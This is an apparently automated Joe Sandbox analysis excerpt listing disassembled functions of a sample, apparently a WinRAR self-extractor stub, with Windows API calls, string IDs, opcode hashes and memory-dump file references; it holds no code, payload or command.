                                                • Opcode ID: 0e2319444d5ca43cab944a72489ebea3cdd818102682decf70b580447799eff2
                                                • Instruction ID: 75094786d9c1bc265598d80a9919b4be25dfc6e900ad3a0ba2a63df2225cc6a3
                                                • Opcode Fuzzy Hash: 0e2319444d5ca43cab944a72489ebea3cdd818102682decf70b580447799eff2
                                                • Instruction Fuzzy Hash: 7B613D71A103199FDB14EFA4DC95AAFBBF9FF48710B544098E512B72A0CB70AD81CB60
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3_wcslen
                                                • String ID: $</p>$</style>$<br>$<style>
                                                • API String ID: 3746244732-3393513139
                                                • Opcode ID: 6a8dd59aab9d8091829e9034ef43dc3ee46f068c374b4feccfbaea3f9217a904
                                                • Instruction ID: 460b9a86e3c08b8dba0004dbbcbc759f87cb76d2d489b95fd2d22d13fd8a7d62
                                                • Opcode Fuzzy Hash: 6a8dd59aab9d8091829e9034ef43dc3ee46f068c374b4feccfbaea3f9217a904
                                                • Instruction Fuzzy Hash: 4F510435B40312A6DB309A2488627F672E5EF64741FE800D9FD91BB2C0EB75DDD083A0
                                                APIs
                                                  • Part of subcall function 00B01E44: GetDlgItem.USER32(00000000,00003021), ref: 00B01E88
                                                  • Part of subcall function 00B01E44: SetWindowTextW.USER32(00000000,00B3C6C8), ref: 00B01E9E
                                                • EndDialog.USER32(?,00000001), ref: 00B20720
                                                • SendMessageW.USER32(?,00000080,00000001,00070459), ref: 00B20747
                                                • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,00050E80), ref: 00B20760
                                                • GetDlgItem.USER32(?,00000065), ref: 00B2077C
                                                • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00B20790
                                                • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00B207A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: MessageSend$Item$DialogTextWindow
                                                • String ID: LICENSEDLG
                                                • API String ID: 3077722735-2177901306
                                                • Opcode ID: 7a8791fb566692b46dce4933a3c3a30a573a7b63b51a2a0204aced5360fb131a
                                                • Instruction ID: c87180379f1903f2bf0cadcf9010c90762855140b9d7b2d8dcf24782add25a0a
                                                • Opcode Fuzzy Hash: 7a8791fb566692b46dce4933a3c3a30a573a7b63b51a2a0204aced5360fb131a
                                                • Instruction Fuzzy Hash: 59219C31399624BBD6116F25BD4DF6B3AEDEB46786F0100C4F605A70A2CFA1AE018B71
                                                APIs
                                                • __aulldiv.LIBCMT ref: 00B1783D
                                                  • Part of subcall function 00B1067E: GetVersionExW.KERNEL32(?), ref: 00B106AF
                                                • FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00B17860
                                                • FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00B17872
                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00B17883
                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B17893
                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B178A3
                                                • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00B178DE
                                                • __aullrem.LIBCMT ref: 00B17984
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                • String ID:
                                                • API String ID: 1247370737-0
                                                • Opcode ID: 7b7f6615a1117f65052aaf8fd0d0c6cca3e782f7938086fec3e5753507de55d4
                                                • Instruction ID: 3d22f783fe89aae6bd91b4581600ace9a2e4a48ca07d236a3d1287722d2260ac
                                                • Opcode Fuzzy Hash: 7b7f6615a1117f65052aaf8fd0d0c6cca3e782f7938086fec3e5753507de55d4
                                                • Instruction Fuzzy Hash: 655138B1548305AFD710DF65C8849ABBBF9FB88714F50892EF59AD3210EB34E948CB52
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B10E50
                                                • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,00000030), ref: 00B10E85
                                                • GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 00B10EC4
                                                • _wcslen.LIBCMT ref: 00B10ED4
                                                • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,00000030), ref: 00B10F51
                                                • GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 00B10F93
                                                • _wcslen.LIBCMT ref: 00B10FA3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: FullNamePath$_wcslen$H_prolog3_
                                                • String ID:
                                                • API String ID: 840513527-0
                                                • Opcode ID: d2a9542b71ddc186423ca99079ef72f8698dc5649db9f36baa04a960344a3cda
                                                • Instruction ID: 66bd29216669f99bc67c3ae3fe681c00b51eef7f0b5babbbac7dfb09045ca465
                                                • Opcode Fuzzy Hash: d2a9542b71ddc186423ca99079ef72f8698dc5649db9f36baa04a960344a3cda
                                                • Instruction Fuzzy Hash: 00617C71D10208ABCB14EFA9D985EEEBBF9EF89710F54459AF410E7290DB749980CB60
                                                APIs
                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00B369AE,?,00000000,?,00000000,00000000), ref: 00B3627B
                                                • __fassign.LIBCMT ref: 00B362F6
                                                • __fassign.LIBCMT ref: 00B36311
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00B36337
                                                • WriteFile.KERNEL32(?,?,00000000,00B369AE,00000000,?,?,?,?,?,?,?,?,?,00B369AE,?), ref: 00B36356
                                                • WriteFile.KERNEL32(?,?,00000001,00B369AE,00000000,?,?,?,?,?,?,?,?,?,00B369AE,?), ref: 00B3638F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                • String ID:
                                                • API String ID: 1324828854-0
                                                • Opcode ID: bcf1c8deeaef1496b4052245e13b4033a8b14a1f87378dbe17b97a7739538b39
                                                • Instruction ID: fad5308aa15a7e32a0bec89df1f40d6d90eaf12a119cbeb548ec4fd16035fa66
                                                • Opcode Fuzzy Hash: bcf1c8deeaef1496b4052245e13b4033a8b14a1f87378dbe17b97a7739538b39
                                                • Instruction Fuzzy Hash: 4951A571E00249AFDB10CFA8DC85AEEBBF8EF09310F24819AE556E7291D7709D44CB64
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 00B293F7
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00B293FF
                                                • _ValidateLocalCookies.LIBCMT ref: 00B29488
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00B294B3
                                                • _ValidateLocalCookies.LIBCMT ref: 00B29508
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 1170836740-1018135373
                                                • Opcode ID: ba2826427a6fe41d5e363f6108c7045e106b70d73e3629c316000245ea0ea855
                                                • Instruction ID: 74142f141c4bc94b07368bb44841a73c6c12a7b487af7b61c18986f793782391
                                                • Opcode Fuzzy Hash: ba2826427a6fe41d5e363f6108c7045e106b70d73e3629c316000245ea0ea855
                                                • Instruction Fuzzy Hash: D8416334A002289BCF20EF68E885A9E7BF5FF45314F1485D5E82D9B392D731AD06CB91
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B1E26C
                                                • ShowWindow.USER32(?,00000000,00000038), ref: 00B1E294
                                                • GetWindowRect.USER32(?,?), ref: 00B1E2D8
                                                • ShowWindow.USER32(?,00000005,?,00000000), ref: 00B1E373
                                                • ShowWindow.USER32(00000000,00000005), ref: 00B1E394
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Window$Show$H_prolog3_Rect
                                                • String ID: RarHtmlClassName
                                                • API String ID: 950582801-1658105358
                                                • Opcode ID: 85b0d889337586f6d7598e1800188be9fd97a447837bda1a44a0b3993f45a900
                                                • Instruction ID: 9ff1e12f2295805a98be86374fa42ffdb0c878ff285173412e653a67ca8d21e8
                                                • Opcode Fuzzy Hash: 85b0d889337586f6d7598e1800188be9fd97a447837bda1a44a0b3993f45a900
                                                • Instruction Fuzzy Hash: 4F412571A01204ABDF119FA4EC89BEE7BF9EF48301F544199FD24AB161DB70D981CB64
                                                APIs
                                                  • Part of subcall function 00B33518: _free.LIBCMT ref: 00B33541
                                                • _free.LIBCMT ref: 00B335A2
                                                  • Part of subcall function 00B303D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00B33546,?,00000000,?,00000000,?,00B3356D,?,00000007,?,?,00B3396A,?), ref: 00B303EA
                                                  • Part of subcall function 00B303D4: GetLastError.KERNEL32(?,?,00B33546,?,00000000,?,00000000,?,00B3356D,?,00000007,?,?,00B3396A,?,?), ref: 00B303FC
                                                • _free.LIBCMT ref: 00B335AD
                                                • _free.LIBCMT ref: 00B335B8
                                                • _free.LIBCMT ref: 00B3360C
                                                • _free.LIBCMT ref: 00B33617
                                                • _free.LIBCMT ref: 00B33622
                                                • _free.LIBCMT ref: 00B3362D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: ab47a35b4bbe4dfe32203c1e62b6aae3bc761e273b4d797f2b7891905fbb6212
                                                • Instruction ID: 29275d33563954d4cb89c9e80fef9ca9e095bad6077ecc4a53ade2974619944c
                                                • Opcode Fuzzy Hash: ab47a35b4bbe4dfe32203c1e62b6aae3bc761e273b4d797f2b7891905fbb6212
                                                • Instruction Fuzzy Hash: 4E114271940B04BBDA30BBB0CC17FCBB7DCAF14B01F514C55B299B6552DA79B6098790
                                                APIs
                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00000000,?,00B24DDA,00B24D3D,00B24FDE,?,00000000,?,?,?,?,?,?,00B253A4,00B472EC), ref: 00B24D76
                                                • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00B24D8C
                                                • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00B24DA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AddressProc$HandleModule
                                                • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                • API String ID: 667068680-1718035505
                                                • Opcode ID: 80203c7aa91d72618451f473721f23c25db40d86e876cfcc9d39c62b317acd58
                                                • Instruction ID: fd307d77d9b5948ed070912cbce56d485edf4999357083d6910f7d33632fccc7
                                                • Opcode Fuzzy Hash: 80203c7aa91d72618451f473721f23c25db40d86e876cfcc9d39c62b317acd58
                                                • Instruction Fuzzy Hash: 03F0C833611A32D70B315EB47C9577A36DCEA0579632006F9D629D7AE0EB60CC114790
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00B2C5A2,00B2C5A2,?,?,?,00B3185A,00000001,00000001,C5E85006), ref: 00B31663
                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00B3185A,00000001,00000001,C5E85006,?,?,?), ref: 00B316E9
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B317E3
                                                • __freea.LIBCMT ref: 00B317F0
                                                  • Part of subcall function 00B3040E: RtlAllocateHeap.NTDLL(00000000,00B2535E,?,?,00B26C16,?,?,?,?,?,00B25269,00B2535E,?,?,?,?), ref: 00B30440
                                                • __freea.LIBCMT ref: 00B317F9
                                                • __freea.LIBCMT ref: 00B3181E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                • String ID:
                                                • API String ID: 1414292761-0
                                                • Opcode ID: e8a8dc1064ebcda645eb571c154260a6ec87ca58853c8890aee08e0541ab9c98
                                                • Instruction ID: bcd02e0e20f69082ceafecb3bdeb4ac79ed0a0805f22a173b9a20a52f728b605
                                                • Opcode Fuzzy Hash: e8a8dc1064ebcda645eb571c154260a6ec87ca58853c8890aee08e0541ab9c98
                                                • Instruction Fuzzy Hash: 4751A3B2600216ABDB259F68CC81EBB77EEEB44750F394AA8FC04E7150EB34DC50D660
                                                APIs
                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?), ref: 00B17B06
                                                  • Part of subcall function 00B1067E: GetVersionExW.KERNEL32(?), ref: 00B106AF
                                                • LocalFileTimeToFileTime.KERNEL32(?,?,?,?), ref: 00B17B2A
                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?), ref: 00B17B44
                                                • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?,?,?), ref: 00B17B57
                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00B17B67
                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00B17B77
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Time$File$System$Local$SpecificVersion
                                                • String ID:
                                                • API String ID: 2092733347-0
                                                • Opcode ID: 7d422435aeb159d3a964b1c05a04413bcebcd6e4ec8c793de719e537e349c47b
                                                • Instruction ID: ae9c6e80ffe43fa941e3569973a59d4076643b1f7dbb486d5b8e7e17c977e56d
                                                • Opcode Fuzzy Hash: 7d422435aeb159d3a964b1c05a04413bcebcd6e4ec8c793de719e537e349c47b
                                                • Instruction Fuzzy Hash: 644125761083159BC704DFA8C88599BBBF8FF98704F04495EF989D7220EB30D948CBA6
                                                APIs
                                                • FileTimeToSystemTime.KERNEL32(?,?,5EA84158,?,?,?,?,00B3AA27,000000FF), ref: 00B1F38A
                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,?,00B3AA27,000000FF), ref: 00B1F399
                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,00B3AA27,000000FF), ref: 00B1F3A7
                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00B3AA27,000000FF), ref: 00B1F3B5
                                                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032,?,?,?,?,00B3AA27,000000FF), ref: 00B1F3D0
                                                • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032,?,?,?,?,00B3AA27,000000FF), ref: 00B1F3FA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Time$System$File$Format$DateLocalSpecific
                                                • String ID:
                                                • API String ID: 909090443-0
                                                • Opcode ID: 540f5d31902a588ca4416c9cd68f180449444ace02dc217b57b48114b39aec51
                                                • Instruction ID: 2e8a890128e6b1e6ac9ed885142a73baaa4e6a898d29faddeb6a402c22e1aab5
                                                • Opcode Fuzzy Hash: 540f5d31902a588ca4416c9cd68f180449444ace02dc217b57b48114b39aec51
                                                • Instruction Fuzzy Hash: F9311CB2500188AFDB24DFA4DD45EEF7BACFB09700F00456AF906E7181EB74AA04CB60
                                                APIs
                                                • GetLastError.KERNEL32(?,?,00B29771,00B296CC,00B26A64), ref: 00B29788
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B29796
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B297AF
                                                • SetLastError.KERNEL32(00000000,00B29771,00B296CC,00B26A64), ref: 00B29801
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                • Opcode ID: 1f63c4bb42240778c27faba5209928c93b48c595b7893fa0c35b310384f2715d
                                                • Instruction ID: e77ae8ac7f68fc35998b44a8c18a857dc44f1645becae4be21719bd06bc377e2
                                                • Opcode Fuzzy Hash: 1f63c4bb42240778c27faba5209928c93b48c595b7893fa0c35b310384f2715d
                                                • Instruction Fuzzy Hash: D901DF36229232EEA6252FB57CE956B6BD8FB02379B3003B9F52C961F4EF114C40D241
                                                APIs
                                                • GetLastError.KERNEL32(?,?,00B2B581,?,00B4E088,?,00B2AE80,?,00B4E088,?,00000007), ref: 00B30009
                                                • _free.LIBCMT ref: 00B3003C
                                                • _free.LIBCMT ref: 00B30064
                                                • SetLastError.KERNEL32(00000000,00B4E088,?,00000007), ref: 00B30071
                                                • SetLastError.KERNEL32(00000000,00B4E088,?,00000007), ref: 00B3007D
                                                • _abort.LIBCMT ref: 00B30083
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_free$_abort
                                                • String ID:
                                                • API String ID: 3160817290-0
                                                • Opcode ID: 66d95aeb9d2ed324fc04b1383b06e4c7a774280eadb05c4dff5b10ad169a8eb3
                                                • Instruction ID: e234694c6a7d9e5b3b45b370f07391dc29e3b1c261e36767a2ff36516fadd2e3
                                                • Opcode Fuzzy Hash: 66d95aeb9d2ed324fc04b1383b06e4c7a774280eadb05c4dff5b10ad169a8eb3
                                                • Instruction Fuzzy Hash: 3CF0A43A154615A7C22A33786C6AF2F3AE9DFC1B61F3501A4F518A3192EF348C468324
                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B23FDB
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B23FF5
                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B24006
                                                • TranslateMessage.USER32(?), ref: 00B24010
                                                • DispatchMessageW.USER32(?), ref: 00B2401A
                                                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B24025
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                • String ID:
                                                • API String ID: 2148572870-0
                                                • Opcode ID: 7e859dcae99c1cd946eca073c98c87c44f59234d2d485ea0a585760b10dd681c
